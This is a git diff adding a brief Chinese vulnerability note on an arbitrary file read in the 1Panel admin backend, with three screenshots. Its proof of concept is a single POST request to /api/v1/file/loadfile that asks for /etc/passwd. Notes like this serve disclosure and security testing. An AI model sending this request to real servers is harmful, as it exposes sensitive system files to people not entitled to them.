diff --git a/document/1Panel后台/1Panel loadfile 后台文件读取漏洞.assets/image-20230815142616338.png b/document/1Panel后台/1Panel loadfile 后台文件读取漏洞.assets/image-20230815142616338.png
new file mode 100644
index 0000000..bbde4cc
Binary files /dev/null and b/document/1Panel后台/1Panel loadfile 后台文件读取漏洞.assets/image-20230815142616338.png differ
diff --git a/document/1Panel后台/1Panel loadfile 后台文件读取漏洞.assets/image-20230815142623048.png b/document/1Panel后台/1Panel loadfile 后台文件读取漏洞.assets/image-20230815142623048.png
new file mode 100644
index 0000000..7b38277
Binary files /dev/null and b/document/1Panel后台/1Panel loadfile 后台文件读取漏洞.assets/image-20230815142623048.png differ
diff --git a/document/1Panel后台/1Panel loadfile 后台文件读取漏洞.assets/image-20230815142629323.png b/document/1Panel后台/1Panel loadfile 后台文件读取漏洞.assets/image-20230815142629323.png
new file mode 100644
index 0000000..662bde1
Binary files /dev/null and b/document/1Panel后台/1Panel loadfile 后台文件读取漏洞.assets/image-20230815142629323.png differ
diff --git a/document/1Panel后台/1Panel loadfile 后台文件读取漏洞.md b/document/1Panel后台/1Panel loadfile 后台文件读取漏洞.md
new file mode 100644
index 0000000..76d69d2
--- /dev/null
+++ b/document/1Panel后台/1Panel loadfile 后台文件读取漏洞.md	
@@ -0,0 +1,17 @@
+**漏洞描述**
+
+1Panel后台存在任意文件读取漏洞，攻击者通过漏洞可以获取服务器中的敏感信息文件
+
+POC
+
+POST /api/v1/file/loadfile {"paht":"/etc/passwd"}
+
+**漏洞复现**
+
+登陆页面
+
+![image-20230815142616338](./1Panel loadfile 后台文件读取漏洞.assets/image-20230815142616338.png)
+
+![image-20230815142623048](./1Panel loadfile 后台文件读取漏洞.assets/image-20230815142623048.png)
+
+![image-20230815142629323](./1Panel loadfile 后台文件读取漏洞.assets/image-20230815142629323.png)
\ No newline at end of file